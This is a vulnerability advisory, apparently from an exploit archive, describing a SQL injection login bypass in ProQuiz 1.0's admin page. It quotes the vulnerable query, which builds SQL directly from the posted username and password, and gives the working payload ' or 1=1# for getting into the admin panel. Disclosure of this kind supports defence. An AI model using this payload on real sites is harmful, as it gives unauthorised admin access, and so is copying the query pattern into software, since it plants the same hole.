ProQuiz 1.0 (Auth Bypass) SQL Injection Vulnerability

2009-03-02 / 2009-03-03
Credit: Osirys
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6312 | CVE-2008-6327
CWE: CWE-89

---------------------------------------------------------------------------------------------------------------------------------------------------------------- [0] GENERAL DETAILS: Name : ProQuiz 1.0 Sql Injection (Auth bypass) Download : http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754 Vulnerability : Sql Injection (Admin Login Bypass) Author : Osirys Contact : osirys[at]live[dot]it ---------------------------------------------------------------------------------------------------------------------------------------------------------------- [1] BUG EXPLANATION: The affected file is /admin/index.php. Let's see the code. [CODE] if($_GET['menu'] != 'madmin') { if(isset($_POST['username']) && isset($_POST['password'])) { $query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' "; [/CODE] ---------------------------------------------------------------------------------------------------------------------------------------------------------------- [2] EXPLOITATION: Just go in /[path]/admin/index.php. Login with the following details: Username : ' or 1=1# Password : anything ----------------------------------------------------------------------------------------------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top